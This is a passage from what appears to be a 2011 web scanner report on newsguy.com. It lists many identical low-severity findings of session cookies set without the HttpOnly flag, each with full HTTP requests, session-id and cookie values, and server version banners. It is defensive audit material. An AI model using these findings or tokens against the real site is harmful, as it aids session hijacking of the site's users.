Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Thu, 24-Feb-2011 14:25:29 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=120
Keep-Alive: timeout=15, max=932
Connection: Keep-Alive
Content-Length: 84113

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <!-- Yoda loves you -->
<head> <title>Technolog
...[SNIP]...

14.29. http://newsguy.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=07e5e76216ca9266b6006a1955c20780; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: newsguy.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:53:34 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=07e5e76216ca9266b6006a1955c20780; path=/
Content-Length: 35166
Cache-Control: private
Content-Type: text/html

<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>

<title>Welcome to Newsguy!</title>
<meta http-equiv="X-UA-Compatible" con
...[SNIP]...

14.30. http://newsguy.com/accountbandwidth.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /accountbandwidth.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=0d5dff58ea2b7fa79c6665d759e36567; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accountbandwidth.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:33 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0d5dff58ea2b7fa79c6665d759e36567; path=/
Content-Length: 9155
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Individual Accounts - Usenet Account Features</title>

...[SNIP]...

14.31. http://newsguy.com/accountemail.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /accountemail.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=0d68fde65b4ff929e7771e9183417ec0; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accountemail.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:18 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0d68fde65b4ff929e7771e9183417ec0; path=/
Content-Length: 9269
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Individual Accounts - Usenet Account Features</title>

...[SNIP]...

14.32. http://newsguy.com/affiliate.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /affiliate.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=074008e54f0654946306e4e65907dd69; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /affiliate.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:45:17 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=074008e54f0654946306e4e65907dd69; path=/
Content-Length: 27709
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Partner Program - Becoming a Newsguy Partner</title>
<
...[SNIP]...

14.33. http://newsguy.com/allinone.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /allinone.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=03a6912f793bb952951adb8e1658ada2; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /allinone.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:42 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=03a6912f793bb952951adb8e1658ada2; path=/
Content-Length: 17579
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<meta http-equiv="Content-Language" content="en-us">

<title>Newsguy -
...[SNIP]...

14.34. http://newsguy.com/birthday.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /birthday.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=0ce021a7a64f02ac240a0a8d1e2acf76; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /birthday.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:36 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0ce021a7a64f02ac240a0a8d1e2acf76; path=/
Content-Length: 12307
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<meta http-equiv="Content-Language" content="en-us">

<title>Newsguy -
...[SNIP]...

14.35. http://newsguy.com/bonusbytes.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /bonusbytes.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=04c5bbd1a9491007cb5f91203243e58b; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bonusbytes.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:36 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=04c5bbd1a9491007cb5f91203243e58b; path=/
Content-Length: 15560
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<meta http-equiv="Content-Language" content="en-us">

<title>Newsguy -
...[SNIP]...

14.36. http://newsguy.com/cellphone.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /cellphone.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=023e3f49f2d18b856da6d8f94167d019; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cellphone.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:45:11 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=023e3f49f2d18b856da6d8f94167d019; path=/
Content-Length: 12608
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<meta http-equiv="Content-Language" content="en-us">

<title>Newsguy - Newsgroups For Cellphones</title>
<meta NAME="description" CONTE
...[SNIP]...

14.37. http://newsguy.com/commd6.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /commd6.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=06c5f7d82a3447eea4d6519eeca1bce1; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /commd6.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:53 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=06c5f7d82a3447eea4d6519eeca1bce1; path=/
Content-Length: 17446
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Web Hosting Services</title>
<meta NAME="description"
...[SNIP]...

14.38. http://newsguy.com/contact.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /contact.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=0c8270d27d9d3631ff3ceea64605bb86; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:30 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0c8270d27d9d3631ff3ceea64605bb86; path=/
Content-Length: 9186
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - How to Contact Newsguy</title>
<meta NAME="description
...[SNIP]...

14.39. http://newsguy.com/copy.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /copy.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=059470dd7ea704c723c81ddbf036d4ba; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /copy.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:45:26 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=059470dd7ea704c723c81ddbf036d4ba; path=/
Content-Length: 11876
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Copyright Notice</title>
<meta name="description" cont
...[SNIP]...

14.40. http://newsguy.com/diagnostics.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /diagnostics.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=0efe28b79fc3d01048db4a97c38af5ed; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /diagnostics.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:05 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0efe28b79fc3d01048db4a97c38af5ed; path=/
Content-Length: 8200
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - Testing Your Connection</title>
<meta name="description" content="Test your connection to Newsguy, a provider of Comme
...[SNIP]...

14.41. http://newsguy.com/email.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /email.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=0e5fcc0aee2c92abb216c13cc08d7e69; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /email.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:39 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0e5fcc0aee2c92abb216c13cc08d7e69; path=/
Content-Length: 9327
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - Spam Free Email Accounts!</title>
<meta NAME="description" CONTENT="Unlimited Internet Access, Web Hosting, Usenet new
...[SNIP]...

14.42. http://newsguy.com/groups.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /groups.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=0e6392c5076efee38380c3142855f369; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /groups.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:36 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0e6392c5076efee38380c3142855f369; path=/
Content-Length: 15879
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - NewsguyGroups... - Overview</title>
<meta NAME="descri
...[SNIP]...

14.43. http://newsguy.com/ispcon.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /ispcon.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=09f460e512ac271d0a5c0f9309dbe44c; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ispcon.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:45:45 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=09f460e512ac271d0a5c0f9309dbe44c; path=/
Content-Length: 3910
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - ISPCON Show</title>
<meta name="description" content="Copyright notice for Newsguy News Service, a provider of Commerc
...[SNIP]...

14.44. http://newsguy.com/javascript:LoginNow()

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /javascript:LoginNow()

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=00325277de0c956f453f2d7371dd45bc; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /javascript:LoginNow() HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 22:45:33 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=00325277de0c956f453f2d7371dd45bc; path=/
Location: /
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 0


14.45. http://newsguy.com/members.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /members.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=00da9a944623b64631e869c738c369e5; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:53 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=00da9a944623b64631e869c738c369e5; path=/
Content-Length: 44100
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Member Services and Features</title>
<meta NAME="descr
...[SNIP]...

14.46. http://newsguy.com/msgpanel/message.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /msgpanel/message.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=0370095ac18704d8174a3b589b9974d8; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msgpanel/message.asp HTTP/1.1
Host: newsguy.com
Proxy-Connection: keep-alive
Referer: http://newsguy.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:02:33 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0370095ac18704d8174a3b589b9974d8; path=/
Content-Length: 45101
Cache-Control: private
Content-Type: text/html

<head>
<style type="text/css">
<!--
body {
   font-size:10px;
   scrollbar-face-color:#26589E;
}
td {
   font-size:10px;
   scrollbar-face-color:#26589E;
}
font {
   font-size:10px;
}
//-->
</styl
...[SNIP]...

14.47. http://newsguy.com/news.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /news.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=0e83dea317d99a7de52fe1750cde8b8b; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news.asp HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:05 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0e83dea317d99a7de52fe1750cde8b8b; path=/
Content-Length: 46840
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Accessing Newsgroups With Direct Read News</title>
<me
...[SNIP]...

14.48. http://newsguy.com/news.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /news.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=07d8619e23c66c94db17f947a018eeac; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:05 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=07d8619e23c66c94db17f947a018eeac; path=/
Content-Length: 46840
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Accessing Newsgroups With Direct Read News</title>
<me
...[SNIP]...

14.49. http://newsguy.com/newsguys.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /newsguys.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=0540c815ac03e969256e365468d2bfb0; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /newsguys.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:02 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0540c815ac03e969256e365468d2bfb0; path=/
Content-Length: 23875
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Newsguy Referral Program</title>
<meta NAME="descripti
...[SNIP]...

14.50. http://newsguy.com/overview.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /overview.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=07c1fd007b57ee5d13cb4f4071a9b2eb; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /overview.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:39 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=07c1fd007b57ee5d13cb4f4071a9b2eb; path=/
Content-Length: 33263
